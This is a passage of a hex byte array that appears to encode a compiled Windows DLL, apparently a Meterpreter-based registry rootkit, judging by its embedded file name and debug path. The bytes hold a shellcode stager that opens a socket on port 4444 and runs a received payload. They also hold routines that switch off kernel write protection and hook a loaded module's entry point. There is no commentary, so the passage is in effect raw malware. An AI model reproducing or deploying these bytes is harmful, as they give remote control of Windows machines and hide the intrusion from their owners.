x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63,\r\n0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e,\r\n0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20,\r\n0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00,\r\n0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,\r\n0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,\r\n0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,\r\n0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,\r\n0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,\r\n0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,\r\n0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46,\r\n0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72,\r\n0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c,\r\n0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c,\r\n0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61,\r\n0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65,\r\n0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72,\r\n0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04,\r\n0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00,\r\n0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,\r\n0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65,\r\n0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00,\r\n0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00,\r\n0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72,\r\n0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65,\r\n0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,\r\n0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,\r\n0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41,\r\n0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65,\r\n0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32,\r\n0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64,\r\n0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00,\r\n0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00,\r\n0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,\r\n0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac,\r\n0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72,\r\n0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\r\n0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\r\n0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\r\n0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\r\n0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\r\n0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\r\n0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\r\n0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\r\n0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\r\n0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,\r\n0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,\r\n0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,\r\n0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,\r\n0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5,\r\n0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d,\r\n0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\r\n0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,\r\n0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,\r\n0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30,\r\n0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30,\r\n0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31,\r\n0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31,\r\n0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31,\r\n0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33,\r\n0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33,\r\n0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33,\r\n0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34,\r\n0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34,\r\n0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35,\r\n0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35,\r\n0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x10,0x8b,0x45,0x08,0x50,0xe8,0xd1,0xe1,0xff,0xff,0xc7,\r\n0x45,0xf8,0x00,0x16,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,0xe0,0x02,\r\n0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x4a,0x68,0x00,0x16,0x00,0x00,\r\n0x68,0x60,0x39,0x00,0x10,0x8b,0x55,0xfc,0x52,0xe8,0x80,0xdc,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x45,0x08,0x50,0x68,0x14,0x2e,0x00,0x10,0xe8,0x51,0xd6,0xff,0xff,0x89,\r\n0x45,0xf0,0x8b,0x4d,0x08,0x51,0x68,0x10,0x2e,0x00,0x10,0xe8,0x40,0xd6,0xff,0xff,\r\n0x89,0x45,0xf4,0x8b,0x55,0xf0,0x8b,0x45,0xf8,0x89,0x02,0x8b,0x4d,0xf4,0x8b,0x55,\r\n0xfc,0x89,0x11,0xeb,0x0d,0x68,0xec,0x09,0x00,0x10,0xe8,0x03,0xdc,0xff,0xff,0x83,\r\n0xc4,0x04,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0x01,0xff,0x15,0x00,0x03,0x00,0x10,0x0f,0x20,0xc0,0x25,0xff,\r\n0xff,0xfe,0xff,0x0f,0x22,0xc0,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x0f,0x20,0xc0,0x0d,0x00,0x00,0x01,0x00,0x0f,0x22,0xc0,0x5d,0xc3,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0xe8,0xc5,0xff,0xff,0xff,0x6a,0x06,0x68,0xf4,0x2d,\r\n0x00,0x10,0xa1,0x0c,0x2e,0x00,0x10,0x50,0xe8,0xe1,0xdb,0xff,0xff,0x83,0xc4,0x0c,\r\n0xe8,0xcb,0xff,0xff,0xff,0x8b,0x4d,0x0c,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,\r\n0x2e,0x00,0x10,0x89,0x45,0xfc,0x8b,0x45,0xfc,0x50,0x68,0x04,0x0a,0x00,0x10,0xe8,\r\n0x7e,0xdb,0xff,0xff,0x83,0xc4,0x08,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x04,0x03,\r\n0x00,0x10,0x85,0xc0,0x75,0x07,0xc6,0x05,0xfa,0x2d,0x00,0x10,0x01,0x83,0x7d,0xfc,\r\n0x00,0x0f,0x8c,0x1c,0x01,0x00,0x00,0x8b,0x0d,0xfc,0x2d,0x00,0x10,0x51,0x6a,0x00,\r\n0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xf8,0x83,0x7d,0xf8,0x00,0x0f,0x84,0xf6,\r\n0x00,0x00,0x00,0x8b,0x15,0xfc,0x2d,0x00,0x10,0x52,0xa1,0x1c,0x2e,0x00,0x10,0x50,\r\n0x8b,0x4d,0xf8,0x51,0xe8,0x65,0xdb,0xff,0xff,0x83,0xc4,0x0c,0x8b,0x15,0x08,0x2e,\r\n0x00,0x10,0x2b,0x15,0x00,0x2e,0x00,0x10,0x52,0x8b,0x45,0xf8,0x50,0xe8,0x4e,0xd8,\r\n0xff,0xff,0xe8,0x19,0xff,0xff,0xff,0x8b,0x0d,0x04,0x2e,0x00,0x10,0x51,0x8b,0x55,\r\n0xf8,0x03,0x15,0x00,0x2e,0x00,0x10,0x52,0xa1,0x08,0x2e,0x00,0x10,0x50,0xe8,0x2b,\r\n0xdb,0xff,0xff,0x83,0xc4,0x0c,0xe8,0x15,0xff,0xff,0xff,0x8b,0x0d,0x08,0x2e,0x00,\r\n0x10,0x2b,0x0d,0x00,0x2e,0x00,0x10,0x89,0x4d,0xf0,0x8b,0x55,0xf0,0x52,0xe8,0x4d,\r\n0xfe,0xff,0xff,0x8b,0x45,0xf0,0x50,0x68,0x90,0x25,0x00,0x10,0xe8,0xdf,0xd4,0xff,\r\n0xff,0x89,0x45,0xf4,0x8b,0x4d,0xf4,0x51,0x68,0x34,0x0a,0x00,0x10,0xe8,0xb0,0xda,\r\n0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x0f,0xb6,0x15,0xfa,\r\n0x2d,0x00,0x10,0xf7,0xda,0x1b,0xd2,0x23,0x15,0x1c,0x2e,0x00,0x10,0x52,0x8b,0x45,\r\n0xf4,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x4d,0xec,\r\n0x51,0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x7c,0x0c,\r\n0x8b,0x55,0xec,0x52,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x45,0xfc,0x50,\r\n0x68,0x60,0x0a,0x00,0x10,0xe8,0x58,0xda,0xff,0xff,0x83,0xc4,0x08,0x6a,0x00,0x8b,\r\n0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0x08,0xc7,0x42,0x34,0x00,\r\n0x00,0x00,0x00,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xfc,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x28,0x89,0x45,0xf8,0x6a,0x06,\r\n0x8b,0x4d,0xf8,0x51,0x68,0xf4,0x2d,0x00,0x10,0xe8,0x40,0xda,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x55,0xf8,0x89,0x15,0x0c,0x2e,0x00,0x10,0xe8,0x01,0xfe,0xff,0xff,0x8b,\r\n0x45,0xf8,0xc6,0x00,0x68,0x8b,0x4d,0xf8,0xc7,0x41,0x01,0x20,0x50,0x00,0x10,0x8b,\r\n0x55,0xf8,0xc6,0x42,0x05,0xc3,0xe8,0x05,0xfe,0xff,0xff,0x68,0x20,0x50,0x00,0x10,\r\n0x8b,0x45,0xf8,0x50,0x68,0x88,0x0a,0x00,0x10,0xe8,0xc4,0xd9,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x0c,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,\r\n0x4d,0x10,0xc7,0x01,0x00,0x00,0x00,0x00,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,\r\n0x3c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x14,0x8b,0x45,0xf8,0x8d,0x4c,\r\n0x10,0x18,0x89,0x4d,0xf0,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,\r\n0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xec,0x83,\r\n0xc2,0x01,0x89,0x55,0xec,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x06,0x39,0x4d,0xec,0x0f,\r\n0x83,0xdc,0x00,0x00,0x00,0x8b,0x55,0xf0,0x8b,0x45,0x08,0x03,0x42,0x0c,0x89,0x45,\r\n0xdc,0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,0x02,0x0f,0x84,0xb0,\r\n0x00,0x00,0x00,0x68,0xc8,0x0a,0x00,0x10,0x8d,0x45,0xe0,0x50,0xe8,0x0f,0xe0,0xff,\r\n0xff,0x85,0xc0,0x0f,0x84,0x9a,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x74,0x4f,0x8b,\r\n0x4d,0xfc,0x03,0x4d,0xf4,0x8b,0x55,0xf0,0x39,0x4a,0x0c,0x75,0x41,0x8b,0x45,0xf8,\r\n0x8b,0x48,0x38,0x83,0xe9,0x01,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,\r\n0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,\r\n0x45,0xf8,0x03,0x48,0x38,0x89,0x4d,0xd4,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,\r\n0x89,0x55,0xd4,0x8b,0x45,0xf4,0x03,0x45,0xd4,0x89,0x45,0xf4,0xeb,0x45,0x8b,0x4d,\r\n0xf0,0x8b,0x51,0x0c,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9,0x01,\r\n0x8b,0x55,0xf0,0x23,0x4a,0x08,0x74,0x1c,0x8b,0x45,0xf8,0x8b,0x48,0x38,0x83,0xe9,\r\n0x01,0xf7,0xd1,0x8b,0x55,0xf0,0x23,0x4a,0x08,0x8b,0x45,0xf8,0x03,0x48,0x38,0x89,\r\n0x4d,0xd0,0xeb,0x09,0x8b,0x4d,0xf0,0x8b,0x51,0x08,0x89,0x55,0xd0,0x8b,0x45,0xd0,\r\n0x89,0x45,0xf4,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xe9,0x0b,0xff,0xff,\r\n0xff,0x8b,0x55,0xf4,0x3b,0x15,0x04,0x2e,0x00,0x10,0x72,0x75,0x8b,0x45,0xfc,0x50,\r\n0x8b,0x4d,0xf4,0x51,0x68,0xd0,0x0a,0x00,0x10,0xe8,0x54,0xd8,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xfc,0x89,0x02,0x8b,0x4d,0x10,0x8b,0x55,0xf4,0x89,\r\n0x11,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a,0x18,0x89,\r\n0x45,0xf0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xd8,0x83,0xc1,\r\n0x01,0x89,0x4d,0xd8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xd8,0x73,0x1d,\r\n0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0xff,0xff,0xff,0xfd,0x8b,0x45,0xf0,0x89,\r\n0x50,0x24,0x8b,0x4d,0xf0,0x83,0xc1,0x28,0x89,0x4d,0xf0,0xeb,0xce,0xb0,0x01,0xeb,\r\n0x02,0x32,0xc0,0x8b,0xe5,0x5d,0xc2,0x0c